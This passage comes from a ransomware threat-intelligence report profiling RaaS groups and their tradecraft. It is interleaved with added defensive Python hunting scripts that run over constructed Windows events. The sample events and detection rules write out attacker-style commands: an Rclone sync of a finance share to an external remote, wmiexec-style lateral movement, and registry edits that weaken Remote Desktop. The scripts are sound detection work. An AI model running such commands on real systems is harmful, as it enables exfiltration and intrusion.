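    """Group discovery events per (host, account), slide `window` over them in
    time order and raise one alert per key when at least `min_categories`
    distinct categories occur inside the window."""
    by_key = defaultdict(list)
    for ev in events:
        cats = classify(ev["cmd"])
        if cats:
            by_key[(ev["host"], ev["account"])].append(
                (datetime.fromisoformat(ev["time"]), cats, ev["cmd"]))

    alerts = []
    for (host, account), items in by_key.items():
        items.sort(key=lambda it: it[0])
        for i, (start, _, _) in enumerate(items):
            in_window = [it for it in items[i:] if it[0] - start <= window]
            seen = set().union(*(it[1] for it in in_window))
            if len(seen) >= min_categories:
                alerts.append({"host": host, "account": account,
                               "start": start.isoformat(),
                               "categories": sorted(seen),
                               "commands": [it[2] for it in in_window]})
                break  # one alert per host/account is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in find_discovery_bursts(EVENTS):
        print(f"{alert['host']} {alert['account']} at {alert['start']}: "
              f"{', '.join(alert['categories'])}")
        for cmd in alert["commands"]:
            print("   ", cmd)
```

Grouping by account as well as host matters: the same three commands run by three different administrators on a jump host is routine, while one service account running all three within minutes at 02:00 is the profile the text describes and deserves the swift triage the following paragraph calls for.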
This human decision-making early in the reconnaissance and intrusion stages means that even if a target’s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks “in production” from an undetected location in their target’s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, by the time the attack reaches the active stage of deleting backups or shadow copies, ransomware deployment is minutes away, and the adversary has likely already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.

### Exfiltration and double extortion

Ransomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and “double extortion,” which refers to attackers threatening to leak data if a ransom hasn’t been paid, has also become a common tactic among many RaaS affiliate programs, many of which offer a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.

This trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. Exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don’t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models, or are performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion actor is DEV-0537 (also known as LAPSUS$), which is profiled below.

### Persistent and sneaky access methods

Paying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers’ demands doesn’t guarantee that attackers ever “pack their bags” and leave a network. Attackers are determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren’t successfully evicted.

The handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist, rather than malware implants such as Cobalt Strike, is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.

Some of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:

 * AnyDesk
 * Atera Remote Management
 * ngrok.io
 * Remote Manipulator System
 * Splashtop
 * TeamViewer

Another popular technique attackers perform once they attain privileged access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol’s security (for example, by turning off Network Level Authentication), and add new users to the Remote Desktop Users group.

The time between initial access and hands-on-keyboard deployment can vary wildly depending on the groups and their workloads or motivations.
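The persistence and exfiltration tooling described above (Rclone syncs to an external remote, commodity remote-access tools, backdoor accounts added to Remote Desktop Users, and Remote Desktop settings being rolled back) each leave a distinct event, which makes them a good fit for a hunting query. The following Python is an added example written for this page, not code from the original post or from Microsoft. It runs over a small, constructed set of event records in a hypothetical, simplified field layout (`host`, `event_id`, `image`, `cmdline`, `target_object`, and so on); the process names, Sysmon event IDs and rule thresholds are assumptions to verify against your own telemetry schema.

```python
"""Hunting logic for the persistence and exfiltration tradecraft listed in the
post, run over a constructed (made-up) list of Windows event records.  The field
names are a simplified, hypothetical normalisation of Sysmon and Security
events, not any product's schema."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Process names of the remote-access tools the post lists (from vendor docs as
# recalled; assumption to verify against the builds deployed in your estate).
REMOTE_ACCESS_TOOLS = {
    "anydesk.exe": "AnyDesk", "ateraagent.exe": "Atera", "ngrok.exe": "ngrok",
    "rutserv.exe": "Remote Manipulator System", "sragent.exe": "Splashtop",
    "srserver.exe": "Splashtop", "teamviewer.exe": "TeamViewer",
}
# Attackers rename rclone.exe, so match the command line's *shape* instead: a
# transfer sub-command plus a "remote:path" argument.  Two or more characters
# before the colon exclude C:\ drive paths; (?!//) excludes URLs.
RCLONE_SUBCMD = re.compile(r"(?:^|\s)(copy|copyto|sync|move|moveto)(?=\s|$)", re.I)
RCLONE_REMOTE = re.compile(r"(?:^|\s)([A-Za-z0-9_-]{2,}):(?!//)\S*")
# Well-known local group SIDs: 544 = Administrators, 555 = Remote Desktop Users.
SENSITIVE_LOCAL_GROUPS = {"S-1-5-32-544": "Administrators",
                          "S-1-5-32-555": "Remote Desktop Users"}
# Registry values whose change to 0 (Sysmon event 13) enables RDP or weakens it.
RDP_ROLLBACK = {
    r"terminal server\fdenytsconnections": "Remote Desktop enabled",
    r"rdp-tcp\userauthentication": "Network Level Authentication disabled",
    r"rdp-tcp\securitylayer": "TLS security layer dropped to legacy RDP",
}


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def hunt(events):
    """Return one Finding per suspicious event."""
    findings = []
    for e in events:
        host, eid = e["host"], e["event_id"]
        if eid == 1:  # Sysmon process creation
            image = e["image"].rsplit("\\", 1)[-1].lower()
            cmd = e.get("cmdline", "")
            if image in REMOTE_ACCESS_TOOLS:
                findings.append(Finding(host, "remote-access-tool",
                                        f"{REMOTE_ACCESS_TOOLS[image]} launched from {e['image']}"))
            remote = RCLONE_REMOTE.search(cmd)
            if image == "rclone.exe" or (remote and RCLONE_SUBCMD.search(cmd)):
                target = remote.group(1) if remote else "?"
                findings.append(Finding(host, "rclone-exfil",
                                        f"rclone-style transfer to remote '{target}' by {image}"))
        elif eid == 4720:  # a user account was created
            findings.append(Finding(host, "backdoor-account",
                                    f"{e['subject_user']} created {e['target_user']}"))
        elif eid == 4732 and e.get("group_sid") in SENSITIVE_LOCAL_GROUPS:  # local group add
            findings.append(Finding(host, "sensitive-group-add",
                                    f"{e['member']} added to {SENSITIVE_LOCAL_GROUPS[e['group_sid']]}"))
        elif eid == 13 and "0x00000000" in e["details"]:  # Sysmon registry value set
            key = e["target_object"].lower()
            for suffix, meaning in RDP_ROLLBACK.items():
                if key.endswith(suffix):
                    findings.append(Finding(host, "rdp-rollback", f"{meaning} via {e['image']}"))
    return findings


def rules_by_host(findings):
    """Distinct rules that fired per host."""
    out = defaultdict(set)
    for f in findings:
        out[f.host].add(f.rule)
    return dict(out)


def hosts_to_triage_first(findings, min_rules=2):
    """Hosts where several behaviours coincide: the hands-on-keyboard case."""
    return sorted(h for h, rules in rules_by_host(findings).items() if len(rules) >= min_rules)


# Constructed sample events for this example (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 1, "image": r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
     "cmdline": r"svchost.exe sync C:\Finance\Shares mega:backup --transfers 32"},  # renamed rclone
    {"host": "WS01", "event_id": 1, "image": r"C:\ProgramData\AnyDesk\AnyDesk.exe",
     "cmdline": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    {"host": "SRV02", "event_id": 4720, "subject_user": r"CORP\admin.svc", "target_user": "support1"},
    {"host": "SRV02", "event_id": 4732, "subject_user": r"CORP\admin.svc", "member": "support1",
     "group_sid": "S-1-5-32-555"},
    {"host": "SRV02", "event_id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    {"host": "SRV02", "event_id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication",
     "details": "DWORD (0x00000000)"},
    {"host": "WS07", "event_id": 1, "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "cmdline": "TeamViewer.exe"},
    {"host": "WS03", "event_id": 4732, "subject_user": r"CORP\helpdesk", "member": r"CORP\it-support",
     "group_sid": "S-1-5-32-545"},  # Users group: not sensitive, not flagged
]

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.host:6} {f.rule:20} {f.detail}")
    print("triage first:", hosts_to_triage_first(found))
```

The rclone rule deliberately ignores the image name and keys on the argument structure, because the first sample event shows the binary renamed to `svchost.exe` in a user-writable directory. The remote-access-tool rule needs an allow-list of hosts where each tool is licensed, or it will fire on every help desk session. Hosts that trip several rules at once are the hands-on-keyboard case the post describes and belong at the top of the triage queue.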
Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can’t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can’t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars, because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware-associated threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.

Figure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022

The human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.

## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks

For organizations to successfully respond and evict an active attacker, it’s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it’s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.

In the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:

 * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today
 * ELBRUS: (Un)arrested development
 * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs
 * DEV-0237: Prolific collaborator
 * DEV-0206 and DEV-0243: An “evil” partnership
 * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate
 * DEV-0537: From extortion to destruction

Microsoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled “Ransomware-linked emerging threat activity group detected”. We also add the note “Ongoing hands-on-keyboard attack” to alerts that indicate a human attacker is in the network. When these alerts are raised, it’s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.

A note on threat actor naming: as part of Microsoft’s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to unidentified threat actors as a “development group”. We use a naming structure with a prefix of “DEV” to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHORUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV stage. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use “contractors,” who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.

### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today

A vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, BazaLoader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter’s shutdown in June 2021, as well as Ryuk’s successor Conti and Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today.

DEV-0193’s actions and use of the cybercriminal gig economy mean they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups.
Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them under the DEV-0193 umbrella.

A subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444.

The chat files leaked from a group publicly labeled as the “Conti Group” in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload, even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the “Conti Group,” even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates, and the one responsible for developing the “Conti Manual” leaked in August 2021, is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193’s BazaLoader infrastructure.

### ELBRUS: (Un)arrested development

ELBRUS, also known as FIN7, has been in operation since at least 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.

In 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made of an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.

ELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called “Combi Security” and “Bastion Security” to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.

In 2020, ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the Maze and REvil RaaS families. ELBRUS then developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute them to a monolithic gang often obscures the true relationship between the attackers, which is certainly the case for the DarkSide RaaS. Case in point: one of the most infamous DarkSide deployments wasn’t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.

ELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.

While they aren’t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. In April 2022, ELBRUS was also observed abusing CVE-2021-31207 in Exchange Server to compromise organizations, an interesting pivot to a less popular, authenticated vulnerability in the ProxyShell cluster. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and to turn compromised low-privileged user credentials into highly privileged access as SYSTEM on the Exchange Server.

### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs

An excellent example of how clustering activity based on ransomware payload alone can obscure the threat actors behind an attack is DEV-0504.
DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the “REvil gang” or “BlackCat ransomware group”. This attribution masks the actions of the set of attackers under the DEV-0504 umbrella, as well as those of other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment.

Figure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022

DEV-0504 shifts payloads when a RaaS program shuts down, for example after the shutdown of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren’t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older “fully owned” ransomware payloads like Phobos, which they can buy when a RaaS isn’t available or when they don’t want to pay the fees associated with RaaS programs.

DEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren’t protected with tamper protection.

DEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.

### DEV-0237: Prolific collaborator

Like DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.

After the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn’t want Hive’s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.

Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022

Beyond RaaS payloads, DEV-0237 also uses the cybercriminal gig economy to gain initial access to networks. DEV-0237’s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups rather than performing their own initial compromise and malware development.

Figure 5. Examples of DEV-0237’s relationships with other cybercriminal activity groups

Like all RaaS affiliates, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSAdmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March 2022, DEV-0237 was observed using a new version of Hive again.

### DEV-0206 and DEV-0243: An “evil” partnership

Malvertising, which refers to taking out a search engine ad that leads to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update or a software package to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the file association so that script files open with a text editor by default instead of the Windows Script Host are largely immune to this threat, even if a user double-clicks the script.

Once successfully executed, the JavaScript framework, also referred to as [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243.
DEV-0243 falls under activities tracked by the cyber intelligence industry as “EvilCorp.” The custom Cobalt Strike loaders are similar to those seen in the publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware’s inner payloads. In DEV-0243’s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.

Around November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the “EvilCorp” activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status.

Figure 6. The handover from DEV-0206 to DEV-0243

### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate

Differing from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)

DEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, ManageEngine ADSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Because the vulnerabilities they prefer sit in server-side applications that run with high privileges, DEV-0401 gains elevated credentials at the initial access stage of their attack.

Once inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of its _wmiexec.py_ module that creates renamed output files, most likely to evade static detections that key on the default file names. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.

Figure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022

Because DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).

Like many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay; however, their frequent rebranding sometimes left these systems unready for their victims, with the leak site occasionally leading to default web server landing pages when victims attempted to pay.
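Two of the DEV-0401 behaviours described above, wmiexec-style lateral movement with renamed output files and ransomware staging into the NETLOGON share, can be hunted without depending on the file names the actor controls: the stock Impacket wmiexec.py wraps every command as `cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\<file> 2>&1` so it can read the output back over SMB, and that redirection structure survives renaming. The following Python is an added example written for this page, not code from the original post or from Microsoft; the event fields (`host`, `event_id`, `image`, `parent_image`, `cmdline`, `target_filename`) are a hypothetical normalization of Sysmon process-creation and file-creation events, and the sample records are constructed.

```python
"""Hunting logic for two DEV-0401 behaviours the post describes: Impacket
wmiexec-style lateral movement with renamed output files, and ransomware
staging via scripts written to the NETLOGON/SYSVOL share.  Added example over
constructed (made-up) event records in a hypothetical normalised schema."""
import re
from dataclasses import dataclass

# Impacket's wmiexec.py runs each command through cmd.exe and redirects the
# output to a file on an admin share so it can be read back over SMB.  The
# stock name is "__<timestamp>", which DEV-0401 renames, so this matches the
# redirection *structure* and ignores the file name entirely.
WMIEXEC_SHAPE = re.compile(
    r"cmd(?:\.exe)?\s+/Q\s+/c\s+(?P<cmd>.+?)\s+1>\s*\\\\(?P<target>[^\\\s]+)\\"
    r"(?P<share>ADMIN\$|C\$)\\(?P<out>\S+)\s+2>&1",
    re.I,
)
# Scripts or binaries dropped where Group Policy will run them domain-wide:
# the NETLOGON share (SYSVOL\<domain>\scripts) or a GPO's startup/shutdown
# script folder.  Both replicate to every DC, so one write reaches all clients.
NETLOGON_PATH = re.compile(
    r"\\(?:netlogon|sysvol\\[^\\]+\\(?:scripts|policies\\.*?\\scripts\\(?:startup|shutdown)))"
    r"\\[^\\]+\.(?:bat|cmd|exe|ps1|vbs)$",
    re.I,
)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def parse_wmiexec(cmdline):
    """Return the remote command and staged output path if cmdline has wmiexec's shape."""
    m = WMIEXEC_SHAPE.search(cmdline)
    if not m:
        return None
    return {"cmd": m["cmd"], "target": m["target"],
            "out": f"\\\\{m['target']}\\{m['share']}\\{m['out']}"}


def hunt(events):
    """One Finding per event that matches either behaviour."""
    findings = []
    for e in events:
        host = e["host"]
        if e["event_id"] == 1:  # Sysmon process creation
            hit = parse_wmiexec(e.get("cmdline", ""))
            if hit:
                # cmd.exe spawned by the WMI provider host is the classic wmiexec tell.
                via_wmi = e.get("parent_image", "").lower().endswith("wmiprvse.exe")
                rule = "wmiexec-lateral-movement" if via_wmi else "wmiexec-shape"
                findings.append(Finding(host, rule, f"ran {hit['cmd']!r}, output staged at {hit['out']}"))
        elif e["event_id"] == 11 and NETLOGON_PATH.search(e["target_filename"]):  # Sysmon file create
            findings.append(Finding(host, "netlogon-script-drop", f"{e['image']} wrote {e['target_filename']}"))
    return findings


# Constructed sample events for this example (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "FS01", "event_id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\winlog.txt 2>&1"},  # renamed output
    {"host": "FS01", "event_id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c dir 1> C:\Temp\out.txt 2>&1"},  # ordinary redirection: not flagged
    {"host": "DC01", "event_id": 11, "image": r"C:\Windows\System32\cmd.exe",
     "target_filename": r"C:\Windows\SYSVOL\sysvol\corp.local\scripts\update.bat"},
    {"host": "DC01", "event_id": 11, "image": r"C:\Windows\System32\svchost.exe",
     "target_filename": r"C:\Windows\SYSVOL\sysvol\corp.local\Policies\{6AC1786C-016F-11D2-945F-00C04FB984F9}\GPT.INI"},
    {"host": "WS05", "event_id": 11, "image": r"C:\Windows\explorer.exe",
     "target_filename": r"\\DC01\NETLOGON\lock.exe"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:5} {f.rule:26} {f.detail}")
```

The GPT.INI write in the sample is an ordinary Group Policy edit and is left alone; what the rule wants is executable content landing in a location that every domain member will run from, which in a healthy environment happens rarely enough to be reviewed by hand. A hit from a non-DC host (WS05 here) writing into NETLOGON over the network is the more alarming of the two, since it implies Domain Admin-level credentials already in attacker hands.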
In a notable shift, possibly related to victim payment issues, DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.

### DEV-0537: From extortion to destruction

An example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.

Once initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn’t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks.

DEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VoIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim’s data and resources.

## Defending against ransomware: Moving beyond protection by detection

